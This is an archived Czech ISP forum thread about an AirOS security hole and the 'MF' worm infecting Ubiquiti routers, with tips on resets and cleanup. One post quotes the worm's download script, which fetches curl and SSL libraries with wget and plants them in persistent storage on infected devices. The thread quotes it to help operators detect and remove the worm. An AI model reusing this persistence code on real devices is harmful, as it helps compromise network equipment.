Toto je původní verze internetového fóra ISPforum.cz do února 2020 bez možnosti registrace nových uživatelů. Aktivní verzi fóra naleznete na adrese https://telekomunikace.cz

Bezpečnostní chyba v AirOS

Návody a problémy s konfigurací.
helapc
Příspěvky: 1012
Registrován: 13 years ago

Re: Bezpečnostní chyba v AirOS

Příspěvekod helapc » 8 years ago

ludvik píše:Ono bez toho webu je to dost bezzubé, to že se nedá nic kloudně nastavit ještě vem čert, ale i rychlý nákuk na informace o spoji je pak prostě opruz. A nejsem si jistý, že jde povolit web bez rebootu ... musel by být na to fígl, který neznám.
helapc píše:Není lepší zakázat Web, jak jsme již psal na začátku? SSH použije až když si tam nahraje klíč.


A i když si to tedy u infrastrukturních věcí představím a budu to tak používat ... u klientských věcí je to prostě nemožné. U domácích wifi routerů stoprocentně.


Bezzubé to není, web server ti jen umožňuje pouštět příkazy z grafického prostředí. Pár příkazů jsem už uvedl výše. Taky jsem uvedl jak zapínat Web prostředí a žádný restart u toho nenastane. http_enable
Snažím se jen prezentovat, že díra a problém je Web server, rozhodně není problém scriptování a ssh.
0 x

helapc
Příspěvky: 1012
Registrován: 13 years ago

Příspěvekod helapc » 8 years ago

ludvik píše:jenže mf.tar odtamtud netahá ... to by pak byla obrana asi poměrně hodně jednoduchá. Alespoň v první fázi.

Obsah scrimtu download ve viru MF:
#!/bin/sh
per=/etc/persistent/.mf

test -d /tmp/down || mkdir /tmp/down
cd /tmp/down

dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}



test -e $per/curl || dwn http://downloads.openwrt.org/kamikaze/8 ... 1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://downloads.openwrt.org/kamikaze/8 ... 1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://downloads.openwrt.org/kamikaze/8 ... 1_mips.ipk 'usr/lib/lib*'

Jak napsal kolega výše tahá si curl. Důležitý je, že když to zjistíš máš možnost zařízení odvirovat dřív než ti lehne, tudíž vzdáleně.
0 x

Robotvor
Příspěvky: 803
Registrován: 14 years ago
antispam: Ano

Příspěvekod Robotvor » 8 years ago

U několika starších jednotek ( Nanostation5 a Loco ) jsme se setkali s problémem že nejdou vyresetovat klasickým způsobem ( přidržení reset tlačítka ) vyresetovat to jde pouze tak že se zařízení první přepne do servisního menu a jakmile je přepnuto znova se na krátko zmáčkne tlačítko reset pak se zařízeno vyresetuje.


Reset byl nutný kvuli tomu že se do zařízení nešlo dostat přes webové rozhraní které se vubec nezobrazí ani SSH.

Setkal se stím někdo?
0 x

lyra
Příspěvky: 569
Registrován: 16 years ago
Bydliště: Rakovník
Kontaktovat uživatele:

Příspěvekod lyra » 8 years ago

U několika starších jednotek ( Nanostation5 a Loco ) jsme se setkali s problémem že nejdou vyresetovat klasickým způsobem ( přidržení reset tlačítka ) vyresetovat to jde pouze tak že se zařízení první přepne do servisního menu a jakmile je přepnuto znova se na krátko zmáčkne tlačítko reset pak se zařízeno vyresetuje.


Reset byl nutný kvuli tomu že se do zařízení nešlo dostat přes webové rozhraní které se vubec nezobrazí ani SSH.

Setkal se stím někdo?


Ano samozřejmě al u 50 % jsme to nakonec stejně vyřadili a dali nové.
0 x

CrazyApe
Příspěvky: 790
Registrován: 9 years ago

Příspěvekod CrazyApe » 8 years ago

Robotvor píše:U několika starších jednotek ( Nanostation5 a Loco ) jsme se setkali s problémem že nejdou vyresetovat klasickým způsobem ( přidržení reset tlačítka ) vyresetovat to jde pouze tak že se zařízení první přepne do servisního menu a jakmile je přepnuto znova se na krátko zmáčkne tlačítko reset pak se zařízeno vyresetuje.


Reset byl nutný kvuli tomu že se do zařízení nešlo dostat přes webové rozhraní které se vubec nezobrazí ani SSH.

Setkal se stím někdo?



Ano u nas taky, musel jsem do nejakeho toho módu kde se prez TFTP nahraje znova firmware.
0 x

DarkLogic
Příspěvky: 1315
Registrován: 13 years ago

Příspěvekod DarkLogic » 8 years ago

Taky mám asi jedno takové. Místo web rozhraní jen bílá stránka bez chybové hlášky, při pokusu o SSH po zadání přihlašovacího jména odmítne spojení (tj. nezeptá se ani na heslo). Zatím ale jinak přenáší bezproblému data zákazníků, odpovídá na pingy a na SNMP požadavky.

Zatím jsem to neřešil, ale pouhé vypnout/zapnout teda nepomůže? A je možné dostat se do servisního módu např. přes PoE zdroj s resetovacím tlačítkem, abych to mohl provést v pohodě z rozvaděče na zemi a nemusel lézt na střechu?
0 x

Robotvor
Příspěvky: 803
Registrován: 14 years ago
antispam: Ano

Příspěvekod Robotvor » 8 years ago

DarkLogic píše:Taky mám asi jedno takové. Místo web rozhraní jen bílá stránka bez chybové hlášky, při pokusu o SSH po zadání přihlašovacího jména odmítne spojení (tj. nezeptá se ani na heslo). Zatím ale jinak přenáší bezproblému data zákazníků, odpovídá na pingy a na SNMP požadavky.

Zatím jsem to neřešil, ale pouhé vypnout/zapnout teda nepomůže? A je možné dostat se do servisního módu např. přes PoE zdroj s resetovacím tlačítkem, abych to mohl provést v pohodě z rozvaděče na zemi a nemusel lézt na střechu?


Přes POE s reset tlačítkem to nejde, aplikuj postup jak jsem psal výše.
0 x

gulas
Příspěvky: 1
Registrován: 8 years ago
Bydliště: Všude a nikde
Kontaktovat uživatele:

Příspěvekod gulas » 8 years ago

dovolím si nesouhlasit dá se resetovat pres POE ale stary 24V cca 2x vetsi nez co davaji ted ke gridum... mám vyzkoušeno už 4 dny neděláme nic jiného než přehrávání...Předtím a ted bouřky... :D co prijde priste
0 x

Uživatelský avatar
svestka
Příspěvky: 1423
Registrován: 14 years ago
antispam: Ano

Příspěvekod svestka » 7 years ago

0 x
UPDATE klienti SET internet_povolen = false WHERE po_splatnosti > 500
Lepší než výhra ve Sportce :)

raven-il
Příspěvky: 1097
Registrován: 18 years ago
Kontaktovat uživatele:

Příspěvekod raven-il » 7 years ago

Neni to uplne sem, ale je to novy typ utoku, tak to sem hodim.

Dneska rano se nam na nekolika ubnt routerech objevilo toto:

HACKED-ROUTER-HELP-SOS-HAD-DUPE-PASSWORD

zarizeni bezi, ale je nedostupne a nelze ho ani vyresetovat. Potkal jste se s tim nekdo ?
0 x
Josef Smola
k mikrotiku jsem se vratil po 4 letech a mam pocit, ze kdyby zakazali vsechny zabugovany feature, zustane jen ten barevnej terminal....

miko
Příspěvky: 94
Registrován: 9 years ago

Příspěvekod miko » 7 years ago

raven-il píše:Dneska rano se nam na nekolika ubnt routerech objevilo toto:
HACKED-ROUTER-HELP-SOS-HAD-DUPE-PASSWORD


aku tam mas verziu FW?
0 x

raven-il
Příspěvky: 1097
Registrován: 18 years ago
Kontaktovat uživatele:

Příspěvekod raven-il » 7 years ago

miko píše:
raven-il píše:Dneska rano se nam na nekolika ubnt routerech objevilo toto:
HACKED-ROUTER-HELP-SOS-HAD-DUPE-PASSWORD


aku tam mas verziu FW?


5.6.8 a 5.6.5

Neco jsou jeste stare 5.5.4 tam je hlaska HACKED-ROUTER-HELP-SOS-DEFAULT-PASSWORD
0 x
Josef Smola
k mikrotiku jsem se vratil po 4 letech a mam pocit, ze kdyby zakazali vsechny zabugovany feature, zustane jen ten barevnej terminal....

beny-dka
Příspěvky: 37
Registrován: 10 years ago

Příspěvekod beny-dka » 7 years ago

A po upgrade na poslední verzi OS to tam zůstalo ? Zkoušel jsi to projet scenem na viry od UBNT ?
0 x

Uživatelský avatar
Selič
Příspěvky: 818
Registrován: 14 years ago
antispam: Ano

Příspěvekod Selič » 7 years ago

5.6.8 a 5.6.5

Neco jsou jeste stare 5.5.4 tam je hlaska HACKED-ROUTER-HELP-SOS-DEFAULT-PASSWORD



Tak na těch starých máš motherfuckera a jestli mají ty novější stejná hesla, tak se do nich motherfucker nahrál taky, přepsal heslo na MOTHERFUCKER, ale jinak samotný vir neběží.
Zkus najít na fórech hesla, na která si to motherfucker měnil a zkusit se pod nimi přihlásit. Pak upgrade na 5.6.9 a mělo by být hotovo.
0 x
"Slepému neukážeš, hluchému nepovíš, debilovi nedokážeš..."

raven-il
Příspěvky: 1097
Registrován: 18 years ago
Kontaktovat uživatele:

Příspěvekod raven-il » 7 years ago

Selič píše:
5.6.8 a 5.6.5

Neco jsou jeste stare 5.5.4 tam je hlaska HACKED-ROUTER-HELP-SOS-DEFAULT-PASSWORD



Tak na těch starých máš motherfuckera a jestli mají ty novější stejná hesla, tak se do nich motherfucker nahrál taky, přepsal heslo na MOTHERFUCKER, ale jinak samotný vir neběží.
Zkus najít na fórech hesla, na která si to motherfucker měnil a zkusit se pod nimi přihlásit. Pak upgrade na 5.6.9 a mělo by být hotovo.


Mate nekdo potuchy, jaky to tam zapsalo login, pokud je heslo MOTHERFUCKER ? Hledal jsem a nenasel. Osobne jsme resil jen verzi 3 a tam je to jinak.

Diky
0 x
Josef Smola
k mikrotiku jsem se vratil po 4 letech a mam pocit, ze kdyby zakazali vsechny zabugovany feature, zustane jen ten barevnej terminal....